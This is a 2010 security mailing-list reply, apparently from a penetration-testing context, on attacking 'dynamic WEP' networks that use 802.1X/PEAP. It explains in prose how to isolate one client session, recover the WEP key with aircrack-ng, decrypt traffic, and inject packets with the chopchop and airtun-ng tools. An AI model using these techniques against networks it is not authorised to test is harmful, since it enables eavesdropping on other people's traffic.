Re: Advice on Attacking WEP Using 802.1X

[Joshua Wright <jwright () hasborg com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 10/21/2010 10:23 PM, Matt Neely wrote:
> Anyone have any advice on attacking a WEP network using 802.1X 
> authentication?  From reviewing a packet capture it appears like the 
> network is specifically using PEAP.  For PEAP I'd usually use OpenRADIUS 
> with the WPE patch and a fake AP.  But the AP I have on hand does not 
> support enterprise authentication with WEP.
>
> Any thoughts, advice or pointers?

Standard WEP cracking still applies, but you have to limit your packet
capture to one AP<->STA connection (wlan.addr eq [clientmac]) and within
one login sesssion (look for unencrypted EAP frames to identify
reauthentication exchanges).

Despite being called "dynamic WEP", keys are not dynamically rotated, so
as long as the user is connected to the AP you can collect packets and
use them with aircrack-ng to recover the WEP key.  From there, you can't
connect to the network easily, but you can decrypt all the traffic with
airdecap-ng or Wireshark.

Also, consider using the Aireplay-ng chopchop attack to decrypt some
traffic, then use the keystream (.xor file) data with airtun-ng to
inject some packets of your own (one-way injection only).

- -Josh
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkzBxAMACgkQapC4Te3oxYzMtwCgk3CL8vlW0F/T0TK1agVVwISa
26cAoJI747fAwqV9/Rcl15SF2yDnCdmz
=ffP6
-----END PGP SIGNATURE-----
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com